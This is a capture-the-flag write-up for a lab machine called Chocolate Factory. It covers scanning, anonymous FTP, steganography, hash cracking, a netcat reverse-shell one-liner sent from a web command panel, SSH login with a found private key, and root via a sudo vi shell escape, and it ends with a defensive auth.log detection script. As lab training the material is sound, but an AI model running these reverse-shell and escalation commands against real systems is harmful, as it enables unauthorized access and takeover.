Chocolate Factory

Reconnaissance
Initial nmap scan to find open ports, using the -Pn flag ("treat all hosts as alive", which skips host discovery so a host that drops ping probes is still scanned)
nmap -Pn 10.10.46.164

Detailed Nmap scan:
Command breakdown:
(-sV): Service version detection
(-sC): Default nmap scripts
(-p): Specifying ports 21,22,80
(-oN nmap): Saving the output into a file called nmap
nmap -sV -sC -p 21,22,80 -oN nmap 10.10.46.164

Enumeration
Port 21: FTP
Anonymous login is allowed, so let's check it out
ftp 10.10.46.164

Let's list the files.

Looks like there is one file and it is an image, so let's transfer it to our machine
get gum_room.jpg

Let's look at the image

Let's see if there is information hidden in the file using steghide.
steghide info gum_room.jpg

I hit enter for the passphrase and it worked. We have one file called b64.txt, let's extract it.
steghide --extract -sf gum_room.jpg

Let's read the file

Let's decode it. After decoding, this is the output.

We have the password hash for the user Charlie. Let's use hashcat to crack this hash to get Charlie's password. Copy the hash into a file called hash.txt.

And now let's use hashcat to crack it.
hashcat -a 0 -m 1800 hash.txt /usr/share/wordlists/rockyou.txt

We found the password: cn7824, let's try to log in through SSH.

Looks like this is not the password for SSH, so let's go explore port 80
Port 80: HTTP
Let's visit the website

It's a login page. Remember the credentials we found? Let's use them to log in.

We logged in, and it looks like we can run commands. Normal commands work, so let's use this to get a reverse shell. First, start a netcat listener
nc -lvnp 1234

Let's get a reverse shell from here.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f
Let's execute this command, and we get a reverse shell on the machine

Let's stabilize this shell using these commands
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl + Z
stty raw -echo; fg
reset
Ctrl + C
export TERM=xterm-color

Let's list the files in the current directory

We have a validate.php file, let's read it

We see the credentials we just used to log in to the web page. I tried to run the key file, but it said permission denied

So I used strings, a command that prints the readable character sequences inside a binary, and it gave me important information
strings key_rev_key

We have a key. With this information we can answer two questions in the room.

I was enumerating when I realized that we can change directories into Charlie's home, so I listed the files and found user.txt and some other files.

Let's read the teleport file.

It's an RSA private key; we can use this to log in as charlie through SSH, so let's do that. First, copy the contents of the file into a file on your machine called id_rsa.

Now we should restrict the permissions of the file (ssh refuses to use a private key that is readable by other users)
chmod 600 id_rsa

Now let's log in
ssh -i id_rsa charlie@10.10.46.164

We are logged in.
Privilege Escalation
Let's run sudo -l to see what we can run as root
sudo -l

Looks like we can run /usr/bin/vi as root, so let's go to GTFOBins to find the commands to escalate our privileges to root.

Let's run this command
sudo vi -c ':!/bin/sh' /dev/null

We are now root. Let's cd into the root folder to find the root flag. It looks like we need to run a Python script to get the flag; when we run it, it asks for a key. Remember the key we found during enumeration: type that in and you should get the flag.
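On the defensive side, the sudo invocation used above leaves a record in auth.log. The following script is an added example, not part of the original writeup: it parses sudo's syslog records and flags shell-capable binaries run as root, rating an explicit vi shell escape higher than a plain edit. The log lines, the SHELL_CAPABLE list and the ESCAPE_MARKERS are constructed assumptions.

```python
import re
from os.path import basename

# Constructed sample auth.log lines in the format sudo writes via syslog (not captured from the lab box).
SAMPLE_AUTH_LOG = """\
Oct  1 10:02:11 factory sudo:  charlie : TTY=pts/0 ; PWD=/home/charlie ; USER=root ; COMMAND=list
Oct  1 10:02:40 factory sudo:  charlie : TTY=pts/0 ; PWD=/home/charlie ; USER=root ; COMMAND=/usr/bin/vi -c :!/bin/sh /dev/null
Oct  1 10:05:03 factory sudo:  charlie : TTY=pts/0 ; PWD=/home/charlie ; USER=root ; COMMAND=/usr/bin/vi /etc/motd
Oct  1 10:06:15 factory sudo:    admin : TTY=pts/1 ; PWD=/root ; USER=root ; COMMAND=/usr/bin/apt update
"""

# Field layout of a sudo command record: "<user> : TTY=... ; PWD=... ; USER=<runas> ; COMMAND=<argv>".
SUDO_LINE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s+:\s+TTY=(?P<tty>\S+)\s+;\s+PWD=(?P<pwd>\S+)\s+;"
    r"\s+USER=(?P<runas>\S+)\s+;\s+COMMAND=(?P<cmd>.*)$"
)

# Assumed list of editors and pagers that can spawn a child process; a sudoers entry for them is effectively a root shell.
SHELL_CAPABLE = {"vi", "vim", "view", "less", "more", "nano"}
# Command-line fragments that ask vi/vim for a shell escape (":!cmd" runs cmd, ":sh" opens an interactive shell).
ESCAPE_MARKERS = (":!", ":sh")

def parse_sudo_line(line):
    """Return the fields of one sudo command record, or None for any other line."""
    m = SUDO_LINE.search(line)
    return m.groupdict() if m else None

def classify(rec):
    """'high' for an explicit shell escape, 'medium' for a shell-capable binary run as root, else None."""
    if rec["runas"] != "root" or rec["cmd"] == "list":  # "list" is how sudo logs 'sudo -l'
        return None
    argv = rec["cmd"].split()
    if not argv or basename(argv[0]) not in SHELL_CAPABLE:
        return None
    if any(marker in arg for arg in argv[1:] for marker in ESCAPE_MARKERS):
        return "high"
    return "medium"

def audit_sudo_log(text):
    """Scan auth.log text; return (user, severity, command) for every suspicious sudo invocation, in order."""
    findings = []
    for line in text.splitlines():
        rec = parse_sudo_line(line)
        if rec is not None:
            sev = classify(rec)
            if sev:
                findings.append((rec["user"], sev, rec["cmd"]))
    return findings
```

Run audit_sudo_log over a real auth.log to get the same tuples; the lasting fix is to remove editors from sudoers or replace them with sudoedit, which edits a copy as root without giving the user a root process to escape from.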
